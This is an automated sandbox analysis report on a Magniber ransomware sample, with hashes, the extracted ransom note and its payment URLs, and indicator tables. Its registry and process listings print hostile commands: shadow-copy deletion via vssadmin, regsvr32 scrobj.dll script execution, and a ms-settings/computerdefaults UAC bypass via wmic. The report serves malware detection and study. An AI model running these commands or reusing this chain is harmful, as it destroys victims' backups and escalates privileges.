magniber | 6eeefc25fe1d24d3f46b554a31aea357a4cd04635db5c32dfddf28b5446c09d3

Analysis

max time kernel
154s
max time network
86s
platform
windows10_x64
resource
win10v20210408
submitted
24-09-2021 10:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://30b89af86aec44d00celtalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://30b89af86aec44d00celtalkfzj.jobsbig.cam/eltalkfzj http://30b89af86aec44d00celtalkfzj.boxgas.icu/eltalkfzj http://30b89af86aec44d00celtalkfzj.sixsees.club/eltalkfzj http://30b89af86aec44d00celtalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://30b89af86aec44d00celtalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://30b89af86aec44d00celtalkfzj.jobsbig.cam/eltalkfzj

http://30b89af86aec44d00celtalkfzj.boxgas.icu/eltalkfzj

http://30b89af86aec44d00celtalkfzj.sixsees.club/eltalkfzj

http://30b89af86aec44d00celtalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4772	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4764	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4748	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4708	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4700	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4692	3564	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4684	3564	cmd.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\UnprotectResume.crw => C:\Users\Admin\Pictures\UnprotectResume.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\UseUnregister.crw => C:\Users\Admin\Pictures\UseUnregister.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\StopImport.png => C:\Users\Admin\Pictures\StopImport.png.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\UpdateRestore.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\UpdateRestore.tiff => C:\Users\Admin\Pictures\UpdateRestore.tiff.eltalkfzj	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	process	target process
PID 992 set thread context of 2308	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	sihost.exe
PID 992 set thread context of 2316	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	svchost.exe
PID 992 set thread context of 2492	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	taskhostw.exe
PID 992 set thread context of 3020	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	Explorer.EXE
PID 992 set thread context of 3500	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	RuntimeBroker.exe
PID 992 set thread context of 3812	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	DllHost.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1572 3812 WerFault.exe DllHost.exe

pid	pid_target	process	target process
1572	3812	WerFault.exe	DllHost.exe

Modifies registry class 29 IoCs

Processes:

sihost.exeRuntimeBroker.exetaskhostw.exesvchost.exeExplorer.EXE1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1792 notepad.exe

pid	process
1792	notepad.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	process
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe
1572	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3020 Explorer.EXE

pid	process
3020	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

pid	process
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEWerFault.exeWMIC.exe

description	pid	process
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeDebugPrivilege	1572	WerFault.exe
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	4036	WMIC.exe
Token: SeSecurityPrivilege	4036	WMIC.exe
Token: SeTakeOwnershipPrivilege	4036	WMIC.exe
Token: SeLoadDriverPrivilege	4036	WMIC.exe
Token: SeSystemProfilePrivilege	4036	WMIC.exe
Token: SeSystemtimePrivilege	4036	WMIC.exe
Token: SeProfSingleProcessPrivilege	4036	WMIC.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

Explorer.EXE

pid process

3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
3020 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3020 Explorer.EXE

pid	process
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE

pid	process
3020	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.exesvchost.exeExplorer.EXEcmd.execmd.exetaskhostw.execmd.execmd.execmd.exeRuntimeBroker.execmd.execmd.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2308 wrote to memory of 1792	2308	sihost.exe	notepad.exe
PID 2308 wrote to memory of 1792	2308	sihost.exe	notepad.exe
PID 2308 wrote to memory of 2472	2308	sihost.exe	cmd.exe
PID 2308 wrote to memory of 2472	2308	sihost.exe	cmd.exe
PID 2308 wrote to memory of 2672	2308	sihost.exe	cmd.exe
PID 2308 wrote to memory of 2672	2308	sihost.exe	cmd.exe
PID 2308 wrote to memory of 2768	2308	sihost.exe	cmd.exe
PID 2308 wrote to memory of 2768	2308	sihost.exe	cmd.exe
PID 2316 wrote to memory of 492	2316	svchost.exe	cmd.exe
PID 2316 wrote to memory of 492	2316	svchost.exe	cmd.exe
PID 2316 wrote to memory of 3988	2316	svchost.exe	cmd.exe
PID 2316 wrote to memory of 3988	2316	svchost.exe	cmd.exe
PID 3020 wrote to memory of 3700	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3700	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3000	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3000	3020	Explorer.EXE	cmd.exe
PID 2768 wrote to memory of 4036	2768	cmd.exe	WMIC.exe
PID 2768 wrote to memory of 4036	2768	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 4088	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 4088	2672	cmd.exe	WMIC.exe
PID 2492 wrote to memory of 3676	2492	taskhostw.exe	cmd.exe
PID 2492 wrote to memory of 3676	2492	taskhostw.exe	cmd.exe
PID 2492 wrote to memory of 2240	2492	taskhostw.exe	cmd.exe
PID 2492 wrote to memory of 2240	2492	taskhostw.exe	cmd.exe
PID 3000 wrote to memory of 736	3000	cmd.exe	WMIC.exe
PID 3000 wrote to memory of 736	3000	cmd.exe	WMIC.exe
PID 3988 wrote to memory of 3472	3988	cmd.exe	WMIC.exe
PID 3988 wrote to memory of 3472	3988	cmd.exe	WMIC.exe
PID 492 wrote to memory of 636	492	cmd.exe	WMIC.exe
PID 492 wrote to memory of 636	492	cmd.exe	WMIC.exe
PID 3500 wrote to memory of 416	3500	RuntimeBroker.exe	cmd.exe
PID 3500 wrote to memory of 416	3500	RuntimeBroker.exe	cmd.exe
PID 3500 wrote to memory of 1160	3500	RuntimeBroker.exe	cmd.exe
PID 3500 wrote to memory of 1160	3500	RuntimeBroker.exe	cmd.exe
PID 3700 wrote to memory of 3808	3700	cmd.exe	WMIC.exe
PID 3700 wrote to memory of 3808	3700	cmd.exe	WMIC.exe
PID 2240 wrote to memory of 2468	2240	cmd.exe	WMIC.exe
PID 2240 wrote to memory of 2468	2240	cmd.exe	WMIC.exe
PID 992 wrote to memory of 2676	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 992 wrote to memory of 2676	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 992 wrote to memory of 3528	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 992 wrote to memory of 3528	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 3676 wrote to memory of 664	3676	cmd.exe	WMIC.exe
PID 3676 wrote to memory of 664	3676	cmd.exe	WMIC.exe
PID 1160 wrote to memory of 1144	1160	cmd.exe	WMIC.exe
PID 1160 wrote to memory of 1144	1160	cmd.exe	WMIC.exe
PID 992 wrote to memory of 3928	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 992 wrote to memory of 3928	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 992 wrote to memory of 4104	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 992 wrote to memory of 4104	992	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 3528 wrote to memory of 4244	3528	cmd.exe	WMIC.exe
PID 3528 wrote to memory of 4244	3528	cmd.exe	WMIC.exe
PID 2676 wrote to memory of 4268	2676	cmd.exe	WMIC.exe
PID 2676 wrote to memory of 4268	2676	cmd.exe	WMIC.exe
PID 4104 wrote to memory of 4292	4104	cmd.exe	WMIC.exe
PID 4104 wrote to memory of 4292	4104	cmd.exe	WMIC.exe
PID 3928 wrote to memory of 4304	3928	cmd.exe	WMIC.exe
PID 3928 wrote to memory of 4304	3928	cmd.exe	WMIC.exe
PID 4684 wrote to memory of 5108	4684	cmd.exe	ComputerDefaults.exe
PID 4684 wrote to memory of 5108	4684	cmd.exe	ComputerDefaults.exe
PID 4700 wrote to memory of 4468	4700	cmd.exe	ComputerDefaults.exe
PID 4700 wrote to memory of 4468	4700	cmd.exe	ComputerDefaults.exe
PID 4692 wrote to memory of 4412	4692	cmd.exe	ComputerDefaults.exe
PID 4692 wrote to memory of 4412	4692	cmd.exe	ComputerDefaults.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3020

C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
"C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:2676

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:4268

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:3528

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:4244

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:4304

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:4104

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:4292

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:3808

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:736

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3812

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3812 -s 840
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\System32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
PID:416

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:4176

C:\Windows\System32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:1144

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2492

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:664

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2316

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:492

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:636

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:3472

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2308

\??\c:\windows\system32\notepad.exe
notepad.exe C:\Users\Public\readme.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1792

\??\c:\windows\system32\cmd.exe
cmd /c "start http://30b89af86aec44d00celtalkfzj.jobsbig.cam/eltalkfzj^&1^&33782456^&63^&311^&2215063"
2⤵
PID:2472

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:2768

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
